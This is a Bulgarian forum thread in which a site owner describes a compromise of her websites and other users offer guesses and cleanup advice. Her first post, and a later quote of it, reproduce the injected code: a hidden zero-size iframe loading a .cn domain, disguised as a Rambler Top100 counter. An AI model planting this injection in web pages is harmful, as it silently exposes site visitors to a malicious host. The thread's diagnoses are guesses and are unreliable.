Какво ми дойде на главата :/

rak

rak

Active Member
Миналия ден не мога да си вляза в единия сайт. От Суперхостинг реагираха светкавично и ми писаха, че в сайта ми е добавен код, който създава проблема. Ето го и въпросният код: <!--begin of Rambler's Top100 code --><IFRAME SRC="http://nno.svoboduud.cn/index.php" FRAMEBORDER="0" WIDTH="0" HEIGHT="0"></IFRAME><!--end of Top100 code-->
Като го потърсих в гугъл - що да видя, излиза моя сайт bestbreast.us\в момента е офлайн, защото го изтрих от хоста\ и в него инсталирана контакт форма, която не съм я правила аз. Тогава ми светна, че някой е проникнал в компютъра и всичките тези поразии ги е направил през filezilla-та...Та моя син два дни преинсталира, форматира всичките дялове на компа, сменях пароли и нямах достъп до интернет. Сега проверявам - всичко навсякъде е наред. Според мен се е опитал да събира имейли.
Сега реших да инсталирам filezilla-та на флашка и да я поставям само когато ми трябва и после да я махам, за да предотвратя други подобни издънки.
Отгоре на всичко на сайта от скрипта ме поздравиха с "Нехуй тут делать)"
Тяхната кожа руска....
 
От: Какво ми дойде на главата :/

Защо просто не кажеш на сина си да не сваля порно или поне да ползва тракерите? :d Ще се улесниш много :)
 
От: Какво ми дойде на главата :/

Sammy каза:
Защо просто не кажеш на сина си да не сваля порно или поне да ползва тракерите? :d Ще се улесниш много :)
Увеличете...

Няма никакво порно в компютъра - само музика и разни филми, ами аз ходя да се ровя из руските сайтове и свалям от там разни неща. А сина ми, гадинката, току-що каза, че гледал порното онлайн..а не го свалял:evil:Ама то мъж да не гледа порно едва ли има........
 
От: Какво ми дойде на главата :/

@rak ами тогава другия вариант е да ползваш антивирусна, която не е свалена от съответните руски сайтове :)
П.П. Кажи на сина ти, че това в интернет не е хубаво :)
 
От: От: Какво ми дойде на главата :/

Sammy каза:
@rak ами тогава другия вариант е да ползваш антивирусна, която не е свалена от съответните руски сайтове :)
П.П. Кажи на сина ти, че това в интернет не е хубаво :)
Увеличете...
То на тинейджър акъл дава ли се. Стига ми, че е върл противник на алкохол, цигари и наркотици, сега и порното ли да му спра? Все пак не е в затвора:) То добре че мъжа ми много не разбира от компютри и не може да си намери порно из нета, че тогава ще трябва да се изнеса на палатка...
Сложихме AVG - синчеца я свали от официалния сайт на програмата.
 
От: Какво ми дойде на главата :/

Интересна гледна точка на тинейджър :) Аз лично съм против цигарите... и ракията ;d
 
От: Какво ми дойде на главата :/

:) така ситуацията е следната.
на пц-то си имаш вируси не е само от филезиллата, отсреща хакера си има софтуер чрез който чрез теч от фтп-то ти се връзва към хостинг-а и ти слага този ифрейм във всички файлове index.* default.*.

решението: преинсталираш си компютъра, сменяш си всички ама всички парола, чистиш си всички индекси, а да и за вбъдеще да внимаваш с браузването на сайтове :)
 
От: Какво ми дойде на главата :/

250 ГБ дисково пространство беше форматирано, уиндоус беше инсталиран наново, авиджи - инсталирана, а всичко, вкарано в компа - проверено с нея...други живи души освен мен на тоя комп няма вече...ако има - евала им казвам!
от BanditoII (сина)​
 
От: Какво ми дойде на главата :/

Я прати скрийн със всичките процеси които се рънват във уиндолса да проверим :)
 
От: От: Какво ми дойде на главата :/

rak каза:
250 ГБ дисково пространство беше форматирано, уиндоус беше инсталиран наново, авиджи - инсталирана, а всичко, вкарано в компа - проверено с нея...други живи души освен мен на тоя комп няма вече...ако има - евала им казвам!
от BanditoII (сина)​
Увеличете...

сине, а застъпваш ли хостинг-а от други компютри
П.С. помеждудругото съм 99.9 % процента сигурен че проблема е този който посочих, понеже и аз имаш същия преди време :)
П.С.2 а да и внимавайте какви боклуци си инсталирате на ПЦтата с който си управлявате акаунтите :) май даже имаше някаде подобна тема
 
От: Какво ми дойде на главата :/

Мисля че вече всичко е изчистено от сайтовете - миналия ден изтрих един скрипт, добре че авирата на мой познат е взела да алармира. Някой ако знае нещо за сканиране на сайтове, да каже. Абе каква антивирусна да сложа на тоя комп, сега сложих една панда, ама нещо хич и нямам доверие.
 
От: Какво ми дойде на главата :/

rak каза:
Мисля че вече всичко е изчистено от сайтовете - миналия ден изтрих един скрипт, добре че авирата на мой познат е взела да алармира. Някой ако знае нещо за сканиране на сайтове, да каже. Абе каква антивирусна да сложа на тоя комп, сега сложих една панда, ама нещо хич и нямам доверие.
Увеличете...

Ползвам Avast или NOD32. Не съм имал проблеми от години с вируси.
 
От: Какво ми дойде на главата :/

Аваст го харесвам, нод нещо не ми допадна, преди го бях инсталирала.
 
От: Какво ми дойде на главата :/

ComboFIX е най-доброто решение за вируси.

Това не е антивирусна програма, а трие всички познати вируси до момента.

Ъпдейтва се всеки месец по няколко пъти.
 
От: Какво ми дойде на главата :/

rak каза:
Миналия ден не мога да си вляза в единия сайт. От Суперхостинг реагираха светкавично и ми писаха, че в сайта ми е добавен код, който създава проблема. Ето го и въпросният код: <!--begin of Rambler's Top100 code --><IFRAME SRC="http://nno.svoboduud.cn/index.php" FRAMEBORDER="0" WIDTH="0" HEIGHT="0"></IFRAME><!--end of Top100 code-->
Като го потърсих в гугъл - що да видя, излиза моя сайт bestbreast.us\в момента е офлайн, защото го изтрих от хоста\ и в него инсталирана контакт форма, която не съм я правила аз. Тогава ми светна, че някой е проникнал в компютъра и всичките тези поразии ги е направил през filezilla-та...Та моя син два дни преинсталира, форматира всичките дялове на компа, сменях пароли и нямах достъп до интернет. Сега проверявам - всичко навсякъде е наред. Според мен се е опитал да събира имейли.
Сега реших да инсталирам filezilla-та на флашка и да я поставям само когато ми трябва и после да я махам, за да предотвратя други подобни издънки.
Отгоре на всичко на сайта от скрипта ме поздравиха с "Нехуй тут делать)"
Тяхната кожа руска....
Увеличете...
Извинявай мацо , ама ако някой има достъп до твоя компютър , едва ли ще му е проблем да си сложи файлзила , а това би било най-малкия ти проблем!
Доколкото до атаката , която е била проведена срещу твоя сайт, 90 процента съм сигурен ,че това е XSS ( Cross Site Scripting) и няма нищо общо с компютъра ти .
More Security другия път!
 
От: От: Какво ми дойде на главата :/

scorpiass каза:
Извинявай мацо , ама ако някой има достъп до твоя компютър , едва ли ще му е проблем да си сложи файлзила , а това би било най-малкия ти проблем!
Доколкото до атаката , която е била проведена срещу твоя сайт, 90 процента съм сигурен ,че това е XSS ( Cross Site Scripting) и няма нищо общо с компютъра ти .
More Security другия път!
Увеличете...
Някой е имал достъп до файлзилата, а моята голяма грешка е, че я оставях със запаметени пароли. Сега съм я инсталирала в секюрити режим, без да помни никакви пароли. Също така, когато е станало това нещо, аз доста активно ползвах FTP, обаче за нов сайт, който изобщо не беше засегнат, а атаката беше срещу други два от сайтовете ми, може в момента хакера да не е имал време да се занимава с останалите или е предпочел най-посещаемите, защото целта на атаката беше да се крадат имейли.
Сега свалих една книга за системни администратори, с методи за предпазване от атаки, но е на английски и доста трудно ми върви четенето.
 
От: Какво ми дойде на главата :/

Може и така да стане, но уина и убунтуту да са заедно на една машина. И в сайтовете, пей пал, банки и други подобни да влизам през убунту. Другите глупости да си ги правя в уин.
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе